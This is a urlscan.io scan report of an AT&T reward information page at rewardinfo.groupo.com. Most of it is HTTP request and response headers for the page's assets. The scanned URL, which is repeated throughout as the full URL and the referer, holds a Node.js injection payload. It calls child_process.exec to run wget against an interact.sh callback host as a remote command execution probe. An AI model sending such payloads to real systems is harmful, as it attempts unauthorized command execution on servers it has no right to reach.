urlscan.io logo urlscan.io
SecurityTrails logo

rewardinfo.groupo.com Open in urlscan Pro
40.89.249.127  Public Scan

Go To Rescan Add Verdict Report
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252...
Submission: On October 22 via manual from US — Scanned from DE
 Behaviour Indicators
Similar DOM Content API
Verdicts

Summary

This website contacted 2 IPs in 1 countries across 2 domains to perform 17 HTTP transactions. The main IP is 40.89.249.127, located in Des Moines, United States and belongs to MICROSOFT-CORP-MSN-AS-BLOCK, US. The main domain is rewardinfo.groupo.com.
This is the only time rewardinfo.groupo.com was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

IP Address AS Autonomous System
16 40.89.249.127 8075 (MICROSOFT...)
17 2
Apex Domain
Subdomains		 Transfer
16 groupo.com
rewardinfo.groupo.com
562 KB
0 msecnd.net Failed
az416426.vo.msecnd.net Failed
17 2
Domain Requested by
16 rewardinfo.groupo.com rewardinfo.groupo.com
0 az416426.vo.msecnd.net Failed rewardinfo.groupo.com
17 2

This site contains links to these domains. Also see Links.

Domain
rewardcenter.att.com
www.att.com
about.att.com
Subject Issuer Validity Valid

This page contains 1 frames:

Primary Page: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Frame ID: 44F0F04CDEC9A0A102E71EBD97B0EA67
Requests: 17 HTTP requests in this frame

Screenshot
Live screenshot
Full Image

Page Title

AT&T Reward Info - Reward Process

Detected technologies

Overall confidence: 100%
Detected patterns
  • <link[^>]* href=[^>]*?bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.css
  • bootstrap(?:[^>]*?([0-9a-fA-F]{7,40}|[\d]+(?:.[\d]+(?:.[\d]+)?)?)|)[^>]*?(?:\.min)?\.js
Overall confidence: 100%
Detected patterns
  • jquery[.-]([\d.]*\d)[^/]*\.js
  • jquery.*\.js(?:\?ver(?:sion)?=([\d.]+))?
Overall confidence: 100%
Detected patterns
  • jquery-ui.*\.js

Page Statistics

17
Requests

0 %
HTTPS

0 %
IPv6

2
Domains

2
Subdomains

2
IPs

1
Countries

562 kB
Transfer

1275 kB
Size

0
Cookies

Redirected requests

There were HTTP redirect chains for the following requests:

17 HTTP transactions

Resource
Path		 Size
x-fer		 Type
MIME-Type
Primary Request /
rewardinfo.groupo.com/ 		10 KB
4 KB 		Document
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
7c81206cefc946b3a8e9d236632b1b15a21662b8699764f58864f81de03d9014
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Host
rewardinfo.groupo.com
Connection
keep-alive
Pragma
no-cache
Cache-Control
no-cache
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept-Language
de-DE,de;q=0.9
Accept
text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding
gzip, deflate
Upgrade-Insecure-Requests
1
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept-Language
de-DE,de;q=0.9

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Type
text/html; charset=utf-8
Content-Length
3509
Connection
keep-alive
Cache-Control
private
Content-Encoding
gzip
Vary
Accept-Encoding
Server
X-AspNetMvc-Version
5.2
X-AspNet-Version
Request-Context
appId=cid-v1:4e2b0b21-ef68-4fdf-8bad-265bbb46ea78
X-Powered-By
X-Content-Type-Options
nosniff
X-UA-Compatible
X-XSS-Protection
1; mode=block
X-Frame-Options
DENY
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
bootstrap.css
rewardinfo.groupo.com/Content/ 		205 KB
41 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/Content/bootstrap.css
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
c057d37620f2fc7c9614d1d63a2428ba1258b4b86a284ca156d5ac7d7f40ef17
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
text/css,*/*;q=0.1
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
41770
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
text/css
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
Site.css
rewardinfo.groupo.com/Content/ 		7 KB
2 KB 		Stylesheet
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/Content/Site.css
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
d10e676a2b3fe03b566350c7592754d7fec5da27e43fc636bc69151e86e97c1c
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
text/css,*/*;q=0.1
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:27 GMT
Content-Encoding
gzip
X-Content-Type-Options
nosniff
X-AspNet-Version
X-Powered-By
Connection
keep-alive
Content-Length
1946
X-XSS-Protection
1; mode=block
X-UA-Compatible
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-Frame-Options
DENY
ETag
"0e9a9272e4dd71:0"
Vary
Accept-Encoding
Content-Type
text/css
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Accept-Ranges
bytes
rewardProcess2.png
rewardinfo.groupo.com/Content/images/ 		58 KB
58 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/rewardProcess2.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
a237a2468d38121e0bc4784de29b04d91031746ddcbb4aac5d28c6e62e5fbf7c
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
59003
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
rewardTracker.png
rewardinfo.groupo.com/Content/images/ 		4 KB
5 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/rewardTracker.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
d7520584465ef1111ab9c20a30f5f76df5dd42015c49a4b334a6a0437b78dd0e
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
4159
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
VisaCard.png
rewardinfo.groupo.com/Content/images/ 		8 KB
9 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/VisaCard.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
316fc0265345a7b05f3268fbac9da36ae19ce7817c7a2caee0a509654562fc03
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
8585
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
MailerBack.png
rewardinfo.groupo.com/Content/images/ 		63 KB
63 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/MailerBack.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
8afaff93835cf5ae2ae106dc6a2b09118c1f5de519979dc442e098b4b17c7c35
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
64316
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
mailerTracker.png
rewardinfo.groupo.com/Content/images/ 		12 KB
12 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/mailerTracker.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
4636fb276425843f39c69c51b2c6e1f0daacaaaab1e24fbc0669b64696d2e2b7
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
12234
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
mailerTrackerSmall.png
rewardinfo.groupo.com/Content/images/ 		19 KB
19 KB 		Image
General
Check archive.org
Download Go to Show image
Full URL
http://rewardinfo.groupo.com/Content/images/mailerTrackerSmall.png
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
7c52fedc9b7555ff0eb777a34bb3be28236615e2f046dd668fe464c7b16c050d
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36

Response headers

Date
Fri, 22 Oct 2021 22:00:28 GMT
X-Content-Type-Options
nosniff
Last-Modified
Thu, 20 May 2021 04:11:06 GMT
Server
X-AspNet-Version
X-Powered-By
X-Frame-Options
DENY
Content-Type
image/png
X-XSS-Protection
1; mode=block
Content-Security-Policy
default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
Connection
keep-alive
Accept-Ranges
bytes
Content-Length
19128
ETag
"0e9a9272e4dd71:0"
X-UA-Compatible
jquery-3.5.1.js
rewardinfo.groupo.com/scripts/ 		292 KB
113 KB 		Script
General
Check archive.org
Download Go to
Full URL
http://rewardinfo.groupo.com/scripts/jquery-3.5.1.js
Requested by
Host: rewardinfo.groupo.com
URL: http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Protocol
HTTP/1.1
Server
40.89.249.127 Des Moines, United States, ASN8075 (MICROSOFT-CORP-MSN-AS-BLOCK, US),
Reverse DNS
Software
/
Resource Hash
a28d76c983b06d87eb2c6d6deaff7e1d4faf32f12794a92bd5e21c754c06ed9b
Security Headers
Name Value
Content-Security-Policy default-src 'self' *.ytimg.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' *.youtube.com *.ytimg.com; frame-src *.youtube.com
X-Content-Type-Options nosniff
X-Frame-Options DENY
X-Xss-Protection 1; mode=block

Request headers

Pragma
no-cache
Accept-Encoding
gzip, deflate
Host
rewardinfo.groupo.com
Accept-Language
de-DE,de;q=0.9
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Accept
*/*
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
Connection
keep-alive
Cache-Control
no-cache
Accept-Language
de-DE,de;q=0.9
Referer
http://rewardinfo.groupo.com/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%2525252525257C%2525252525257C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://c5jt0ebtbdaep6k88q40cfu78moyyy8q4.interact.sh%27);//
User-Agent
